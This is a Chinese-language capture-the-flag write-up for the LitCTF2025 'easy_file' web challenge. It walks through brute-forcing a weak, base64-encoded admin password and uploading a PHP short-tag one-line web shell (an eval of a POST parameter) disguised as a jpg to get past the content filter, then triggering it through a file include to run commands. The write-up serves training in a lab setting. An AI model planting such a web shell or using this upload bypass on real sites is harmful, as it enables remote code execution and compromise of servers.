短标签一句话实战-LitCTF2025-easy_file

1、打开环境是一个登陆框,输入admin/123456,抓包发现做了base编码。并且对编码中的=做了URL编码,结合提示弱密码,开始爆破。

2、爆破模块操作过程

这个跳转到admin.php。解码得到密码为password。

3、登录admin,出现一个文件上传界面,上传php一句话提示恶意后缀,改为jpg,又提示内容非法。尝试短标签。

在文件上传漏洞的上下文中,"短标签绕过"通常指的是攻击者利用目标服务器开启了对PHP短标签的支持这一点,通过上传包含短标签(如`<?`)的恶意PHP代码来执行远程代码。这是因为服务器可能仅仅检查文件是否包含标准的PHP开头标签(`<?php`),而忽略了短标签。修改一句话为

php 复制代码
<?= @eval($_POST['cmd']);?>

重新上传。提示上传成功

4、蚁剑连接一直报错,于是开始构造payload,首页源码有注释说//file查看头像,尝试file作为get参数,值为上述路径,结合一句话木马cmd命令执行(先ls),成功出现flag。

相关推荐
Pure_White_Sword2 天前
[广东省大学生攻防大赛 2022]pyre
网络安全·ctf·reverse·逆向工程
泷羽Sec-静安2 天前
AICTFer一天速成指南
python·sql·ctf
ad禥思妙想3 天前
BUUCTF_刷题记录(二)
ctf
0vvv04 天前
2026-NCTF-web-N-RustPICA
前端·ctf
yv_304 天前
ssti靶场练习(sstilabs,重庆橘子科技)
ctf·ssti
祁白_8 天前
Bugku:备份是一个好习惯
笔记·学习·web安全·ctf
蒲公英eric9 天前
攻防世界 misc题GFSJ0403-【intoU】
ctf·misc·攻防世界·音频题
kali-Myon11 天前
CTFshow-Pwn142-Off-by-One(堆块重叠)
c语言·数据结构·安全·gdb·pwn·ctf·
三七吃山漆11 天前
BUUCTF[极客大挑战 2019]Http
web安全·网络安全·ctf·极客大挑战
unable code12 天前
[HNCTF 2022 WEEK2]ez_ssrf
网络安全·web·ctf·1024程序员节